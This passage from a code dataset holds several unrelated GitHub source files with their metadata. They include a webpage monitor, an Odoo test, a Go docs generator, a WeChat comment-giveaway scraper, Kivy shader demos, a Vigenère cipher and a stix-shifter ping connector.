get_parsed_webpage(url)\n\n # Error\n except:\n urls.remove(url)\n log('error', url)\n webpage_responses[url]['error'] += 1\n continue\n\n # Ok\n log('ok', url)\n webpage_responses[url]['ok'] += 1\n print(SEPARATOR_TEXT)\n time.sleep(cooldown)\n\n # Monitoring loop\n turn = 1\n while True:\n print(f\"Tura: {turn}\\n\")\n for url in urls:\n # Fetch webpage\n try:\n soup = get_parsed_webpage(url)\n\n # Error\n except:\n log('error', url)\n webpage_responses[url]['error'] += 1\n continue\n\n # Changed\n if soup != last_content[url]:\n log('changed', url)\n webpage_responses[url]['changed'] += 1\n diff = [i.strip() for i in soup if i not in last_content[url]]\n for i in diff:\n print(i)\n\n # Ok\n else:\n log('ok', url)\n webpage_responses[url]['ok'] += 1\n\n # Update last content\n last_content[url] = soup\n print(SEPARATOR_TEXT)\n turn += 1\n time.sleep(cooldown)\n\n # Print summary on exit\n except KeyboardInterrupt:\n print(\"\\n\\nMonitoring zakończony. 
Podsumowanie:\\n\")\n for url in webpage_responses:\n print(f\"{url} - {OK_TEXT}: {webpage_responses[url]['ok']}, {CHANGED_TEXT}: {webpage_responses[url]['changed']}, {ERROR_TEXT}: {webpage_responses[url]['error']}\")\n print()\n\n\ndef main():\n # Set cooldown\n cooldown = input('Podaj cooldown monitoringu w sekundach (60): ')\n if cooldown == '':\n cooldown = 60\n else:\n cooldown = int(cooldown)\n \n\n # Get urls from file\n with open('urls.txt', 'r') as f:\n urls = [line.strip() for line in f]\n\n # Run monitoring\n monitoring_loop(urls, cooldown)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mkalitka/studies","sub_path":"krjp/lista6/z2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37237047669","text":"\ntc = int(input())\n\nfor i in range(1, tc+1):\n isov = False\n n = float(input())\n ans = []\n while(1): # 실수 2진수로 변환\n n = n*2\n ans.append(int(n//1))\n if n%1==0:\n break;\n if len(ans) >= 13:\n isov=True\n n-=n//1\n print(\"#\"+str(i),end=\" \")\n print(\"\".join(map(str, ans)) if not isov else \"overflow\")\n \n \n\n'''\n입력\n3\n0.625\n0.1\n0.125\n\n출력\n#1 101\n#2 overflow\n#3 001\t \n'''","repo_name":"yejipractice/PS_Practice","sub_path":"SW_EXPERT/Advanced_Learn/이진수2.py","file_name":"이진수2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8448804793","text":"from odoo import Command\nfrom odoo.tests import tagged\n\nfrom odoo.addons.project.tests.test_project_sharing import TestProjectSharingCommon\nfrom odoo.addons.sale_timesheet.tests.common import TestCommonSaleTimesheet\n\n@tagged('post_install', '-at_install')\nclass TestSaleTimesheetPortal(TestProjectSharingCommon, TestCommonSaleTimesheet):\n\n def test_ensure_allowed_so_line_field_access(self):\n \"\"\" Ensure that the field so_line of account.analytic.line is accessible for portal user\"\"\"\n # A portal collaborator is added to a project to enable the rule analytic.account.analytic.line.timesheet.portal.user\n self.project_task_rate.write({\n 'collaborator_ids': [\n Command.create({'partner_id': self.user_portal.partner_id.id}),\n ],\n 'privacy_visibility': 'portal',\n 'message_partner_ids': [\n Command.link(self.user_portal.partner_id.id),\n ],\n })\n task1 = self.env['project.task'].create({\n 'name': 'Test Task',\n 'project_id': self.project_task_rate.id,\n })\n # log some timesheets (on the project accessible in portal)\n timesheet1 = self.env['account.analytic.line'].create({\n 'name': 'Test Line',\n 'project_id': self.project_task_rate.id,\n 'task_id': task1.id,\n 'unit_amount': 10.5,\n 'employee_id': self.employee_user.id,\n })\n # Accessing field allowed_so_line_ids as a portal user should not raise any access error\n self.env.invalidate_all()\n timesheet1.with_user(self.user_portal).read(['allowed_so_line_ids'])\n","repo_name":"Vauxoo/odoo","sub_path":"addons/sale_timesheet/tests/test_sale_timesheet_portal.py","file_name":"test_sale_timesheet_portal.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"9541431750","text":"import json\nimport os\nimport os.path\nfrom shutil import copyfile, rmtree\nimport subprocess\nimport sys\nfrom time import sleep\n\nOUTPUT_DIR = './output'\nGAMES_DOCS_DIR = './games'\n\ndef run(command, ignore_errors=False, **kwargs):\n error_code = 
subprocess.call([command], shell=True, **kwargs)\n if not ignore_errors and error_code != 0: # an error happened\n print('unexpected error')\n sys.exit(error_code)\n return error_code\n\ndef ensure_clean_dir(dirs):\n if os.path.isdir(dirs):\n rmtree(dirs)\n os.makedirs(dirs)\n\ndef github_link_to(game_name):\n return 'https://github.com/siggame/Cadre/blob/master/Games/{}/'.format(game_name)\n\ndef package_link_to(game_name):\n return 'pkg/joueur/games/{}/index.html'.format(game_name.lower())\n\ndef replace_pkg_links(s):\n return s.replace(\"pkg.1\", \"\")\n\ndef template_collapsible_section(header, contents):\n return \"\"\"\n
\n\t
\n\t\t

{header} ▹

\n\t
\n\t
\n\t\t

{header} ▾

\n\t\t
\n\t\t\t{contents}\n\t\t
\n\t
\n
\"\"\".format(\n id=header.lower().replace(' ', '-'),\n header=header,\n contents=contents,\n)\n\ndef update_file(output_path, formatter):\n with open(os.path.join(OUTPUT_DIR, output_path), 'r+') as output_file:\n contents = output_file.read()\n contents = replace_pkg_links(contents)\n\n ih = contents.index('')\n contents = '{}{}'.format(\n contents[:ih],\n '../' * output_path.count('/'),\n contents[ih:],\n )\n\n if formatter:\n contents = formatter(contents)\n\n output_file.seek(0)\n output_file.write(''.join(contents))\n\nrun('go get golang.org/x/tools/cmd/godoc@v0.0.0-20191213221258-04c2e8eff935')\n\ngopath = os.getenv('GOPATH')\ngodoc_process = subprocess.Popen(gopath + '/bin/godoc', cwd='../')\n\n# wait 3 seconds for the above process to be ready,\n# no easy API to ensure it actually is\nsleep(30)\n\nensure_clean_dir(OUTPUT_DIR)\nprint('-> Going to scrape the godoc server, this will take some time...')\nwget_error_code = run(\n 'wget -m -k -q -erobots=off -X src/ --no-host-directories --no-use-server-timestamps http://localhost:6060',\n cwd=OUTPUT_DIR,\n timeout=300, # 5 min\n ignore_errors=True,\n)\n\nprint('-> Done scraping. Killing process')\ngodoc_process.kill()\n\nif wget_error_code not in [0, 8]: # 0 is ok, 8 is server error we don't care about\n print('!!-> wget error code', wget_error_code)\n # sys.exit(wget_error_code)\n\nprint('-> Injecting additional documentation into scraped html files')\ngames = {}\nfor filename in os.listdir(GAMES_DOCS_DIR):\n with open(os.path.join(GAMES_DOCS_DIR, filename), 'r') as game_data_file:\n parsed_file = json.load(game_data_file)\n games[parsed_file['game_name']] = parsed_file\n\n# Inject/change up the index.html file a bit to be more Cadre game centric.\ndef root_index_update_contents(contents):\n # auto collapse all sections because the vast majority of the packages\n # are redundant to go users\n contents = contents.replace('class=\"toggleVisible\"', 'class=\"toggle\"')\n\n # and slice in some additional documentation data about the games\n i = contents.index('

')\n return contents[:i] + \"\"\"\n

Joueur.go Documentation

\n\nThis is the documentation for the Go Cadre client and its various game\npackages.\n\n{}\n{}\n\"\"\".format(\n template_collapsible_section(\n 'Games', \"\"\"\n

These are the games that are available to play via the Go Client. Their\n source code is stored in the directory: games/game_name/, where\n game_name is the name of the game.\n
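\n\nPurely as a hypothetical illustration of that layout (chess is used below only as an example game_name, not a guarantee of which games ship with any given build), the directory tree looks roughly like:\n
\ngames/\n    chess/              -- the game package your AI plays\n        ai.go           -- the file holding your AI\n    internal/\n        chess_impl/     -- generated implementations (see the notes further down)\n\n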

\n\n
\n{}\n
\"\"\".format('\\n'.join([\n \"\"\"\n
{game_name}
\n
{description}
\n \"\"\".format(\n game_name=game_name,\n pkg_link=package_link_to(game_name),\n description=games[game_name]['description']\n ) for game_name in sorted(games.keys())\n ]))\n ),\n template_collapsible_section(\n \"Coding Your AI\", \"\"\"\n

Interfaces

\n

With the exception of your AI, which is a struct, all of the game\n    components you will interact with are exposed through Go\n    interfaces. This means that all attributes must be accessed via\n    function calls, e.g.:\n

\nplayer_name := ai.Player().Name()\n
\n

\n
\n

Unless otherwise noted in the documentation, assume all interfaces are\npopulated by an instance of a struct implementing that interface. However, some\nattributes, function calls, etc. will explicitly tell you if the returned value\ncan be nil (a nil pointer).\n
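\nAs a purely illustrative sketch (someUnit, Tile, and processTile are hypothetical placeholder names rather than accessors of any specific game package, and the braces are doubled only so the surrounding Python str.format call leaves them intact), such a nil-able return value can be guarded before use:\n
\nif tile := someUnit.Tile(); tile != nil {{\n    // only dereference tile once the nil check has passed\n    processTile(tile)\n}}\n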

\n\n

Modifying non-AI files

\n

\nEach interface type inside games/game_name/, except for your\n    ai.go, should ideally not be modified.
\nThey are intended to be read-only constructs that hold the state of that\n    object at the point in time you are reading its properties.\n

\n

\nWith that being said, if you really wish to add functionality, such as\n    helper functions, ensure they do not directly modify game state information\n    or interfere with our existing functionality; otherwise there is a good chance your\n    client will crash during gameplay with a DELTA_MERGE_FAILURE.\n

\n

Implementation logic for the interfaces (except your AI) is all tucked away\n    in games/internal/game_name_impl. It is highly recommended not to\n    modify these files, as they are largely written by our \n    Creer code generation tool and may need to be modified if the game\n    structure is tweaked.\n

\n\n

Game Logic

\n\n

If you are attempting to figure out how the logic is executed for a game,\n that code is not here.
\n All Cadre game clients are dumb state tracking\n programs that facilitate IO between a game server and your AI in whatever\n programming language you choose.\n

\n

\nIf you wish to see the actual code for a game, look in the\n    Cerveau game server. Its directory structure is\n    similar to most clients (such as this one).\n

\n\"\"\".format(\n cadre_link='https://github.com/siggame/Cadre',\n cerveau_link='https://github.com/siggame/Cerveau',\n creer_link='https://github.com/siggame/Creer',\n )),\n) + contents[i:]\n\nupdate_file('index.html', root_index_update_contents)\n\n# for each game, add additional text explaining the game\nfor game_name, game_docs in games.items():\n def game_index_update_contents(contents):\n i = contents.index('

\n{description}\n

\n

More Info

\n

\nThe full game rules for {game_name} can be found on GitHub.\n

\n

\nAdditional materials, such as the story and game template, can be found on GitHub as well.\n

\n\"\"\".format(\n description=game_docs['description'],\n game_name=game_name,\n github=github_link_to(game_name)\n )\n ) + contents[i:]\n\n update_file(package_link_to(game_name), game_index_update_contents)\n\ncopyfile('./favicon.ico', os.path.join(OUTPUT_DIR, 'favicon.ico'))\n\nprint('<- Done generating Go docs')\n","repo_name":"siggame/Joueur.go","sub_path":"docs/generate_docs.py","file_name":"generate_docs.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73439919569","text":"#!/usr/bin/python3\n\"\"\"\nprints the State object with name passed as argument the database hbtn_0e_6_usa\nYou must use the module SQLAlchemy\ntake 4 arguments\n\"\"\"\n\n\nimport sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom model_state import Base, State\n\nif __name__ == \"__main__\":\n # MySQL connection using mysqldb driver\n engine = create_engine(\"mysql+mysqldb://{}:{}@localhost/{}\"\n .format(sys.argv[1], sys.argv[2], sys.argv[3]))\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n found = False\n for state in session.query(State):\n if state.name == sys.argv[4]:\n print(\"{}\".format(state.id))\n found = True\n break\n if found is False:\n print(\"Not found\")\n session.close()\n","repo_name":"crasride/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/10-model_state_my_get.py","file_name":"10-model_state_my_get.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40280680453","text":"\"\"\"\nTODO: Describe goal of this demo and some bacground on these concepts:\n\n - Shaders\n - Glsl\n - OpenGL\n - Vertices\n\n\"\"\"\nfrom kivy.app import App\nfrom kivy.base import EventLoop\nfrom kivy.core.image import Image\nfrom kivy.graphics import Mesh\nfrom kivy.graphics.instructions import RenderContext\nfrom kivy.uix.widget import Widget\n\n\nclass BasicGlsl(Widget):\n def __init__(self, **kwargs):\n super(BasicGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'basic.glsl'\n\n \"\"\" #1 Step\n There is no built-in standard format for definining vertices so we\n declare our own.\n\n In this case where we're creating Rectangles, we just need the position\n of each vertices == 'vPosition'. And since the rectangle is\n two-dimensional, we'll pass in 2 coordinates which are of float-type.\n\n \"\"\"\n fmt = (\n (b'vPosition', 2, 'float'),\n )\n\n \"\"\" #2 Step\n We now prepare the array the array that holds the vertices which we'll\n later hand over to the renderer.\n\n Note that the tuple should be flat and unstructured. 
The record format\n shal be defined separately.\n\n \"\"\"\n vertices = (\n 0, 0, # x=0, y=0\n 255, 0, # x=255, y=0\n 255, 255, # x=255, y=255\n 0, 255 # x=0, y=255\n )\n\n \"\"\" #3 Step\n Indices are needed to reuse the vertices as they're usually used in\n more than one triangle.\n\n Instead of repeating them in the array of vertices above, we resort to\n just repeating its index in the array of vertices.\n\n \"\"\"\n indices = (\n 0, 1, 2, # Three vertices make a triangle\n 2, 3, 0 # and another one.\n )\n\n with self.canvas:\n \"\"\" #4\n With all the required structures in place, we can assemble the mesh\n using Kivy's canvas instruction `Mesh`.\n\n It will be rendered over a normal widget which is pretty cool. This\n means that we can take advantage of all that Kivy goodness while\n utilizing the speed and efficiency of Glsl.\n\n \"\"\"\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices)\n\n\nclass ProceduralGlsl(Widget):\n def __init__(self, **kwargs):\n super(ProceduralGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'procedural.glsl'\n\n fmt = (\n (b'vPosition', 2, 'float'),\n )\n\n vertices = (\n 255, 0,\n 510, 0,\n 510, 255,\n 255, 255\n )\n\n indices = (\n 0, 1, 2,\n 2, 3, 0\n )\n\n with self.canvas:\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices)\n\n\nclass ColorfulGlsl(Widget):\n def __init__(self, **kwargs):\n super(ColorfulGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'colorful.glsl'\n\n fmt = (\n (b'vPosition', 2, 'float'),\n (b'vColor', 3, 'float'),\n )\n\n vertices = (\n 0, 255, 0.462, 0.839, 1,\n 255, 255, 0.831, 0.984, 0.474,\n 255, 510, 1, 0.541, 0.847,\n 0, 510, 1, 0.988, 0.474,\n )\n\n indices = (\n 0, 1, 2,\n 2, 3, 0\n )\n\n with self.canvas:\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices)\n\n\nclass TextureGlsl(Widget):\n def __init__(self, **kwargs):\n super(TextureGlsl, self).__init__(**kwargs)\n self.canvas = RenderContext(use_parent_projection=True)\n self.canvas.shader.source = 'texture.glsl'\n\n fmt = (\n (b'vPosition', 2, 'float'),\n (b'vTexCoords0', 2, 'float'),\n )\n\n vertices = (\n 255, 255, 0, 1,\n 510, 255, 1, 1,\n 510, 510, 1, 0,\n 255, 510, 0, 0,\n )\n\n indices = (\n 0, 1, 2,\n 2, 3, 0\n )\n\n with self.canvas:\n Mesh(fmt=fmt, mode='triangles',\n indices=indices, vertices=vertices,\n texture=Image('kivy.jpg').texture)\n\n\nclass GlslDemo(Widget):\n def __init__(self, **kwargs):\n super(GlslDemo, self).__init__(**kwargs)\n self.add_widget(BasicGlsl())\n self.add_widget(ProceduralGlsl())\n self.add_widget(ColorfulGlsl())\n self.add_widget(TextureGlsl())\n\n\nclass GlslApp(App):\n def build(self):\n EventLoop.ensure_window()\n return GlslDemo()\n\n\nif __name__ == '__main__':\n GlslApp().run()\n","repo_name":"cr8ivecodesmith/kivy-glsldemo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15433174515","text":"# BOJ. 
4485 녹색 옷 입은 애가 젤다지\n# 설계 의도: 조건에 맞는 실행\n# 개선점: 다익스트라 구현\n# 1.\nimport sys\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\n\n\nN = int(sys.stdin.readline())\ncase_num = 1\nwhile N != 0:\n board = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n INF = 140626\n value_list = [INF] * (N**2)\n value_list[0] = board[0][0]\n visited = set()\n current_value = 0\n flag = True\n while flag:\n pick = value_list.index(min(value_list))\n x = pick // N\n y = pick % N\n current_value = value_list[pick]\n value_list[pick] = INF\n visited.add(pick)\n for direction in range(4):\n px = x + dx[direction]\n py = y + dy[direction]\n if px == N-1 and py == N-1:\n value_list[px * N + py] = board[px][py] + current_value\n flag = False\n break\n elif 0 <= px < N and 0 <= py < N and (N*px + py) not in visited:\n if board[px][py] + current_value < value_list[px*N + py]:\n value_list[px * N + py] = board[px][py] + current_value\n print(f'Problem {case_num}: {value_list[N*N - 1]}')\n N = int(sys.stdin.readline())\n case_num += 1","repo_name":"DataMarksman/TIL","sub_path":"2.Algorithm/2. Backjoon/02_problem_python/4485.녹색 옷 입은 애가 젤다지(다익스트라).py","file_name":"4485.녹색 옷 입은 애가 젤다지(다익스트라).py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8331337875","text":"# Kevin Chen\n# 10/24/17\n# This program will encode or decode your text in Vigenere cipher\n\n\nalphabet = \"abcdefghijklmnopqrstuvwxyz\"\n\n\ndef encode_text():\n \"\"\"\n This program represent the way to encode text\n :return:encode, the new text after encode\n \"\"\"\n\n code_text = input(\"please enter the text you want to encode\")\n\n code_text = code_text.lower()\n\n code_text = code_text.replace(' ', '')\n\n key = input(\"please enter the key\")\n encode = \"\"\n for x in range(len(code_text)):\n num1 = alphabet.index(code_text[x])\n num2 = alphabet.index(key[x % len(key)])\n\n num = (num1+num2) % 26\n encode += alphabet[num]\n return(encode)\n\n\ndef decode_text():\n \"\"\"\n This program represent the way to decode text\n :return: the text after decode\n \"\"\"\n\n code = input(\"please enter the text you want to decode\")\n\n code = code.lower()\n\n code = code.replace(' ', '')\n\n key = input(\"please enter the key\")\n\n decode = \"\"\n for x in range(len(code)):\n num1 = alphabet.index(code[x])\n num2 = alphabet.index(key[x % len(key)])\n num = (num1-num2) % 26\n decode += alphabet[num]\n \n\n return(decode)\n\n\ndef main():\n choice = input(\"press e to encode, d to decode or q to quit\")\n\n if choice in [\"e\", \"E\"]:\n print(encode_text())\n elif choice in [\"d\", \"D\"]:\n print(decode_text())\n elif choice in [\"q\", \"Q\"]:\n print(\"thanks for playing, have a great day\")\nmain()\n","repo_name":"chenro1998/unit7","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13908557914","text":"# !/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n\r\nimport requests\r\nimport time\r\nimport pyquery\r\nimport re\r\nimport json\r\nimport random\r\nfrom operator import itemgetter\r\nfrom itertools import groupby\r\nimport os\r\n\r\n\r\nclass WeChat(object):\r\n\r\n def __init__(self, username, password):\r\n self.username = username\r\n self.password = password\r\n self.base_url = \"https://mp.weixin.qq.com\"\r\n self.login_url = \"https://mp.weixin.qq.com/cgi-bin/bizlogin?action=startlogin\"\r\n 
self.home_url = \"https://mp.weixin.qq.com/cgi-bin/bizlogin?action=login&token=&lang=zh_CN\"\r\n self.qrcode_url = \"https://mp.weixin.qq.com/cgi-bin/loginqrcode?action=getqrcode¶m=4300&rd=219\"\r\n self.login_status_url = \"https://mp.weixin.qq.com/cgi-bin/loginqrcode?action=ask&token=&lang=zh_CN&token=&lang=zh_CN&f=json&ajax=1&random=0.11243822677080184\"\r\n self.req = None\r\n self.redirect_url = None\r\n self.login()\r\n\r\n # 登陆\r\n def login(self):\r\n self.req = requests.session()\r\n self.req.get(url=self.base_url)\r\n response = self.req.post(\r\n url=self.login_url,\r\n headers={\r\n \"Referer\": self.base_url\r\n },\r\n data={\r\n \"username\": self.username, # 用户名\r\n \"pwd\": self.password, # 密码\r\n \"imgcode\": None,\r\n \"f\": \"json\",\r\n \"token\": None,\r\n \"lang\": \"zh_CN\",\r\n \"ajax\": 1\r\n }\r\n )\r\n self.redirect_url = self.base_url + response.json().get(\"redirect_url\")\r\n\r\n # 获取二维码\r\n def get_qrcode(self): # 获取扫码登录的二维码\r\n img_content = self.req.get(self.qrcode_url)\r\n f = open(\"QR_code.jpg\", \"wb\")\r\n f.write(img_content.content)\r\n f.close()\r\n print(\"二维码图片已下载,请扫码。。。\")\r\n return True\r\n\r\n # 获取登陆状态\r\n def get_login_status(self):\r\n time.sleep(2)\r\n status = False\r\n try:\r\n res = self.req.get(url=self.login_status_url)\r\n result = res.json()\r\n if result.get(\"status\") == 1:\r\n print(\"已确认,正在跳转下一页。。。\")\r\n status = True\r\n elif result.get(\"status\") == 4:\r\n print(\"扫码成功,请点击确认。。。\")\r\n else:\r\n print(\"请扫码。。。\")\r\n except Exception as e:\r\n print(e)\r\n finally:\r\n return status\r\n\r\n # 获取跳转url\r\n def get_redirect_url(self):\r\n home_response = self.req.post(\r\n url=self.home_url,\r\n headers={\r\n \"Referer\": self.redirect_url\r\n },\r\n data={\r\n \"token\": None,\r\n \"lang\": \"zh_CN\",\r\n \"f\": \"json\",\r\n \"ajax\": 1,\r\n \"random\": 0.2394270123688409\r\n }\r\n )\r\n redirect_url = None\r\n home_response = home_response.json()\r\n if home_response[\"base_resp\"].get(\"err_msg\") == \"ok\":\r\n redirect_url = self.base_url + home_response[\"redirect_url\"]\r\n return redirect_url\r\n\r\n # 获取留言总数\r\n def get_total_count(self, html_str):\r\n ret = re.search(r'list: (?P{.*})', html_str)\r\n total_count = 100\r\n if ret:\r\n comments = json.loads(ret.group(\"comments\"))\r\n total_count = comments[\"total_count\"] # 拿到留言总数\r\n return total_count\r\n\r\n # 获取留言页的url\r\n def get_comment_page_url(self, html_str):\r\n dom_obj = pyquery.PyQuery(html_str)\r\n stuff_url = dom_obj(\"a[data-id='10033']\").attr(\"href\")\r\n url = self.base_url + stuff_url\r\n return url\r\n\r\n def get(self, url):\r\n r = self.req.get(url)\r\n return r.text\r\n\r\n def get_comments(self, html_str):\r\n comments = {}\r\n r = re.search(r'list: (?P{.*})', html_str)\r\n if r:\r\n comments = json.loads(r.group(\"comments\"))\r\n return comments\r\n\r\n def pick(self, comments, num):\r\n # 对得到的comments按时间戳排序\r\n comments[\"comment\"].sort(key=itemgetter(\"post_time\"))\r\n # 按用户nick_name 分组,因为同一个人可以有多次评论\r\n d = groupby(comments[\"comment\"], key=itemgetter(\"nick_name\"))\r\n comments_list = ({k: list(v)} for k, v in d)\r\n r = random.sample(list(comments_list), num)\r\n print(\"抽 奖\".center(66, \"=\"))\r\n for item in r:\r\n for k in item:\r\n print(\"-恭喜-[{}]-中奖-!\".format(k).center(66))\r\n print(\"-留言内容:{}\".format(item[k][0].get(\"content\")))\r\n print(\"-留言时间:{}\".format(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(item[k][0].get(\"post_time\")))))\r\n print(\"=\" * 66)\r\n\r\n\r\nif __name__ == '__main__':\r\n # TODO: 
提交前删除用户名和密码\r\n wc = WeChat(\"xxx\", \"xxx\")\r\n # 获取二维码\r\n r = wc.get_qrcode()\r\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\r\n os.popen(\"open -a Preview QR_code.jpg \")\r\n # 扫码,请求状态\r\n while r:\r\n r = not wc.get_login_status()\r\n # 扫码成功之后\r\n print(\"扫码成功\")\r\n redirect_url = wc.get_redirect_url()\r\n if redirect_url:\r\n # 获取跳转之后的html\r\n redirect_html = wc.get(redirect_url)\r\n # 获取留言页的url\r\n comments_page_url = wc.get_comment_page_url(redirect_html)\r\n # 获取留言页html\r\n comments_page_html = wc.get(comments_page_url)\r\n # 获取留言页的评论\r\n comments_tmp = wc.get_comments(comments_page_html)\r\n # 获取留言总数\r\n total_count = comments_tmp.get(\"total_count\")\r\n # 获取留言总数url\r\n total_comments_page_url = comments_page_url.replace(\"count=10\", \"count={}\".format(total_count))\r\n # 获取总的留言页\r\n total_comments_page_html = wc.get(total_comments_page_url)\r\n # 获取总留言\r\n total_comments = wc.get_comments(total_comments_page_html)\r\n # 抽奖\r\n wc.pick(total_comments, 3)\r\n\r\n else:\r\n print(\"扫码之后跳转失败。。。\")\r\n","repo_name":"martin1317/aboutPython","sub_path":"weixin_liwenzhou/wechat2.py","file_name":"wechat2.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71332618769","text":"import torch\n\nprint(\"Running\")\n\nX = torch.tensor([1,2,3,4], dtype=torch.float32)\nY = torch.tensor([2,4,6,8], dtype=torch.float32)\n\nw = torch.tensor(0.0, requires_grad=True, dtype=torch.float32)\n\ndef forward(x):\n return w*x\n\ndef loss(y, y_predited):\n return ((y_predited - y)**2).mean()\n\nprint(f'Prediction before training f(5) = {forward(5):.3f}')\n\n\nlearning_rate = 0.01\nn_iters = 100\n\nfor epoch in range(n_iters):\n #Training\n #prediction forward pass\n y_pred = forward(X)\n\n # Cost function MSE\n l = loss(Y, y_pred)\n\n # Gradient = backward\n l.backward() #dl/dw\n\n # update weights\n with torch.no_grad():\n w -= learning_rate * w.grad\n w.grad.zero_()\n\n if (epoch+1) % 10 == 0:\n print(f'epoch {epoch+1} w = {w.item():.3f} loss = {l.item():.8f}')\n\n\nprint(f'Prediction after training f(5) = {forward(5):.3f}')\n\n\n\n\n","repo_name":"Hansi1007/python-training-workspace","sub_path":"PyTorchTutorial/gradients_torch.py","file_name":"gradients_torch.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43032410506","text":"import json\nimport time\nfrom stix_shifter_utils.modules.base.stix_transmission.base_ping_connector \\\n import BasePingConnector\nfrom stix_shifter_utils.utils.error_response import ErrorResponder\nfrom aiohttp.client_exceptions import ClientConnectionError\nfrom stix_shifter_utils.utils import logger\n\n\nclass PingConnector(BasePingConnector):\n \"\"\"Ping connector class \"\"\"\n def __init__(self, api_client):\n self.api_client = api_client\n self.logger = logger.set_logger(__name__)\n self.connector = __name__.split('.')[1]\n\n async def ping_connection(self):\n \"\"\"\n Ping the endpoint\n :return: dict\n \"\"\"\n try:\n # Construct a response object\n return_obj = {}\n response_dict = {}\n return_obj, response_dict = await self.call_ping_datasource(return_obj,response_dict)\n except ClientConnectionError:\n response_dict['type'] = \"ConnectionError\"\n response_dict['message'] = \"Invalid Host\"\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n except Exception as ex:\n if 'Max retries exceeded' in 
str(ex):\n # sleep added due to limitation of 1 call a second for each user token\n try:\n time.sleep(1)\n return_obj, response_dict = await self.call_ping_datasource(return_obj, response_dict)\n except ClientConnectionError:\n response_dict['type'] = \"ConnectionError\"\n response_dict['message'] = \"Invalid Host\"\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n except Exception as err:\n self.logger.error('error when ping: %s', str(err))\n response_dict['message'] = str(err)\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n return return_obj\n else:\n self.logger.error('error when ping: %s', str(ex))\n ErrorResponder.fill_error(return_obj, response_dict, ['message'],\n connector=self.connector)\n return return_obj\n\n async def call_ping_datasource(self, return_obj, response_dict):\n response = await self.api_client.ping_datasource()\n response_code = response.code\n response_txt = response.read().decode('utf-8')\n response_dict = json.loads(response_txt)\n if response_code == 200:\n return_obj['success'] = True\n return_obj['code'] = response_code\n else:\n return_obj['success'] = False\n return_obj['code'] = response_code\n return return_obj, response_dict\n","repo_name":"opencybersecurityalliance/stix-shifter","sub_path":"stix_shifter_modules/sentinelone/stix_transmission/ping_connector.py","file_name":"ping_connector.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"66"} +{"seq_id":"74812847251","text":"_CUDA_DIR = \"CUDA_DIR\"\n\ndef _impl(rctx):\n cuda_dir = rctx.os.environ.get(_CUDA_DIR, default = \"/usr/local/cuda\")\n rctx.symlink(\"{}/include\".format(cuda_dir), \"include\")\n rctx.symlink(\"{}/lib64\".format(cuda_dir), \"lib64\")\n rctx.file(\"WORKSPACE\")\n rctx.file(\"BUILD\", content = \"\"\"\npackage(default_visibility = [\"//visibility:public\"])\n\ncc_library(\n name = \"cudart_static\",\n srcs = [\"lib64/libcudart_static.a\"],\n hdrs = glob([\n \"include/*.h\",\n \"include/**/*.h\",\n ]),\n strip_include_prefix = \"include\",\n)\n\"\"\")\n\ncuda_configure = repository_rule(\n implementation = _impl,\n environ = [\n _CUDA_DIR,\n ],\n)\n","repo_name":"sail-sg/envpool","sub_path":"third_party/cuda/cuda.bzl","file_name":"cuda.bzl","file_ext":"bzl","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":944,"dataset":"github-code","pt":"66"} +{"seq_id":"25167897237","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript para testar a performance de classificação dos métodos ensemble\r\n\"\"\"\r\n\r\n#Importação dos pacotes utilizados para o estudo\r\nimport pandas as pd\r\nimport os\r\n\r\n#Importação dos métodos ensemble\r\nfrom sklearn.ensemble import BaggingClassifier\r\nfrom sklearn.ensemble import AdaBoostClassifier\r\nfrom sklearn.ensemble import StackingClassifier\r\n\r\n#Importação dos metodos de classificação de modelo 